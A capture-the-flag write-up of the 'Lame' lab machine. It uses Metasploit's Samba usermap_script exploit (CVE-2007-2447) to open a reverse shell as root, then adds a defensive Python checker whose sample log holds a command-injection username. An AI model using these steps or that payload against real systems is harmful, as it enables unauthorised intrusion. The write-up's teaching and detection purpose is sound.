This was such an easy machine that it's almost not worth writing up, but I decided in the end that I would, purely for completeness.
I scanned the machine with Nmap (all TCP ports, with version and OS detection) and was presented with the following details.
# Nmap 7.70 scan initiated Thu Aug 22 10:10:07 2019 as: nmap -A -p- -oN scan 10.10.10.3
Nmap scan report for 10.10.10.3
Host is up (0.065s latency).
Not shown: 65530 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 10.10.14.3
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
| 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: OpenWrt White Russian 0.9 (Linux 2.4.30) (92%), Linux 2.6.23 (92%), Belkin N300 WAP (Linux 2.6.30) (92%), Control4 HC-300 home controller (92%), D-Link DAP-1522 WAP, or Xerox WorkCentre Pro 245 or 6556 printer (92%), Dell Integrated Remote Access Controller (iDRAC5) (92%), Dell Integrated Remote Access Controller (iDRAC6) (92%), Linksys WET54GS5 WAP, Tranzeo TR-CPQ-19f WAP, or Xerox WorkCentre Pro 265 printer (92%), Linux 2.4.21 - 2.4.31 (likely embedded) (92%), Citrix XenServer 5.5 (Linux 2.6.18) (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: -2d23h03m38s, deviation: 0s, median: -2d23h03m38s
| smb-os-discovery:
| OS: Unix (Samba 3.0.20-Debian)
| NetBIOS computer name:
| Workgroup: WORKGROUP\x00
|_ System time: 2019-08-19T02:31:04-04:00
|_smb2-time: Protocol negotiation failed (SMB2)
TRACEROUTE (using port 445/tcp)
HOP RTT ADDRESS
1 30.07 ms 10.10.14.1
2 31.77 ms 10.10.10.3
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Aug 22 10:35:22 2019 -- 1 IP address (1 host up) scanned in 1516.09 seconds
From here we can see that FTP, SSH, SMB and distcc are all running. Anonymous access was allowed on FTP, but there are no files present. The version strings are the interesting part of this scan: vsftpd 2.3.4, OpenSSH 4.7p1, Samba 3.0.20-Debian and distccd v1 are all old enough to be worth looking up individually; this write-up only follows the Samba path. Note also that Nmap reported different Samba versions on 139 and 445 ("3.X - 4.X" versus "3.0.20-Debian"), so the precise version came from the 445 probe. I next tried connecting to SMB:
root@kali://root/websvr# smbclient \\\\10.10.10.3\\tmp -p 445
Enter WORKGROUP\root's password:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Fri Dec 6 16:56:00 2019
.. DR 0 Sun May 20 20:36:12 2012
orbit-makis DR 0 Fri Dec 6 11:25:31 2019
.ICE-unix DH 0 Fri Dec 6 11:03:09 2019
.X11-unix DH 0 Fri Dec 6 11:03:34 2019
gconfd-makis DR 0 Fri Dec 6 11:25:31 2019
.X0-lock HR 11 Fri Dec 6 11:03:34 2019
5120.jsvc_up R 0 Fri Dec 6 11:04:17 2019
7282168 blocks of size 1024. 5678284 blocks available
You can see from the output that we also have anonymous SMB access. However, after some browsing around, there are no useful files stored within SMB either (the listing above is just a world-writable /tmp share).
One of the details detected in the Nmap scan was that Samba 3.0.20-Debian was being used. I did a Google search for exploits involving this version of Samba and found the "username map script" vulnerability (CVE-2007-2447), which affects Samba 3.0.0 through 3.0.25rc3 when smb.conf sets the `username map script` option. With that option enabled, smbd hands the username from the client's session setup request to the configured script via /bin/sh without sanitising it, so a username containing shell metacharacters (backticks, `;`, `$(...)`) gets executed as a command by the smbd process, and no valid credentials are needed. This exploit is included in Metasploit as exploit/multi/samba/usermap_script. So I started msfconsole and ran the exploit:
msf5 > use exploit/multi/samba/usermap_script
msf5 exploit(multi/samba/usermap_script) > set RHOST 10.10.10.3
RHOST => 10.10.10.3
msf5 exploit(multi/samba/usermap_script) > exploit
[*] Started reverse TCP double handler on 10.10.14.25:4444
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo RXu673TIo0yJNYIz;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "RXu673TIo0yJNYIz\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (10.10.14.25:4444 -> 10.10.10.3:59078) at 2019-12-09 20:05:13 +0000
ls
bin
boot
cdrom
dev
etc
home
initrd
initrd.img
lib
lost+found
media
mnt
nohup.out
opt
proc
root
sbin
srv
sys
tmp
usr
var
vmlinuz
whoami
root
cd root
ls
Desktop
reset_logs.sh
root.txt
vnc.log
cat root.txt
[REDACTED]
From the output you can see the exploit ran successfully. Entering the whoami command showed that I was running as root straight away, because smbd itself runs as root on this box, so no privilege escalation step was needed. From here I was able to browse to /root and cat root.txt. The fix on the defensive side is simply to upgrade Samba to 3.0.25 or later, or to remove the `username map script` directive from smb.conf, which closes the code path entirely.
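To turn the Samba finding above into something repeatable, the following script is an added example (my own code, not part of the original write-up, Samba or Metasploit) with three small checks: whether an Nmap-style Samba banner falls in the CVE-2007-2447 affected range, whether an smb.conf actually sets `username map script` (the precondition the exploit needs), and whether a username seen in an auth log carries the shell metacharacters the attack relies on. The banner strings, smb.conf fragments and log lines are constructed for illustration; the `user=... from=...` log format is an assumption, not Samba's real log layout.

```python
"""Triage helpers for the Samba 'username map script' issue (CVE-2007-2447).

Added example, not code from the original write-up or from Samba/Metasploit.
All inputs below (banners, smb.conf fragments, usernames, log lines) are
constructed for illustration.
"""
import re

# Samba 3.0.0 through 3.0.25rc3 contain the vulnerable code path; 3.0.25
# final is fixed.  The path is only reachable when smb.conf sets
# 'username map script', which passes the client-supplied username to
# /bin/sh, so shell metacharacters in the username become command execution.

_VERSION_RE = re.compile(r"\b(\d+)\.(\d+)\.(\d+)(rc\d+)?")


def samba_version_affected(banner: str) -> bool:
    """Return True if an nmap -sV style Samba banner is in the affected range.

    Range banners such as 'Samba smbd 3.X - 4.X' carry no usable version and
    are reported as not affected; rescan port 445 to get a precise string.
    """
    if "samba" not in banner.lower():
        return False
    m = _VERSION_RE.search(banner)
    if not m:
        return False
    major, minor, patch = int(m.group(1)), int(m.group(2)), int(m.group(3))
    prerelease = m.group(4) is not None
    if (major, minor) != (3, 0):
        return False
    return patch < 25 or (patch == 25 and prerelease)


def smbconf_sets_usermap_script(conf_text: str) -> bool:
    """True if a live (non-commented) 'username map script' directive is set.

    Samba ignores case and whitespace inside parameter names, so
    'UserName Map Script' and 'usernamemapscript' are the same key, and
    both '#' and ';' start comment lines.
    """
    for raw in conf_text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;" or "=" not in line:
            continue
        key, value = line.split("=", 1)
        if re.sub(r"\s+", "", key).lower() == "usernamemapscript" and value.strip():
            return True
    return False


# Characters that let a username escape the script's argument under /bin/sh.
_SHELL_META = re.compile(r"[`;|&\n]|\$\(")


def suspicious_username(username: str) -> bool:
    """Flag SMB session-setup usernames carrying shell metacharacters."""
    return _SHELL_META.search(username) is not None


def audit_log_usernames(log_lines):
    """Return suspicious usernames from constructed auth-log lines of the
    assumed form '<timestamp> smbd: session setup user=<name> from=<ip>'."""
    hits = []
    for line in log_lines:
        m = re.search(r"user=(.*?) from=", line)
        if m and suspicious_username(m.group(1)):
            hits.append(m.group(1))
    return hits


# Constructed smb.conf fragments: the weak setting beside the corrected one.
VULNERABLE_CONF = """
[global]
   workgroup = WORKGROUP
   username map script = /etc/samba/scripts/mapusers.sh
"""
FIXED_CONF = """
[global]
   workgroup = WORKGROUP
   # username map script = /etc/samba/scripts/mapusers.sh
"""

# Constructed log lines: one benign login and one metasploit-style username.
SAMPLE_LOG = [
    "Dec  9 20:04:58 smbd: session setup user=makis from=10.10.14.3",
    "Dec  9 20:05:13 smbd: session setup user=/=`nohup id` from=10.10.14.25",
]

if __name__ == "__main__":
    print("banner affected:", samba_version_affected("Samba smbd 3.0.20-Debian"))
    print("vulnerable conf:", smbconf_sets_usermap_script(VULNERABLE_CONF))
    print("fixed conf:", smbconf_sets_usermap_script(FIXED_CONF))
    print("suspicious logins:", audit_log_usernames(SAMPLE_LOG))
```

The version check alone is not enough to call a host vulnerable: the exploit only works when `username map script` is set, which is why the conf check is paired with it. Conversely, the log check catches the attack regardless of whether it succeeded, since the metacharacters are in the username before smbd ever decides what to do with them.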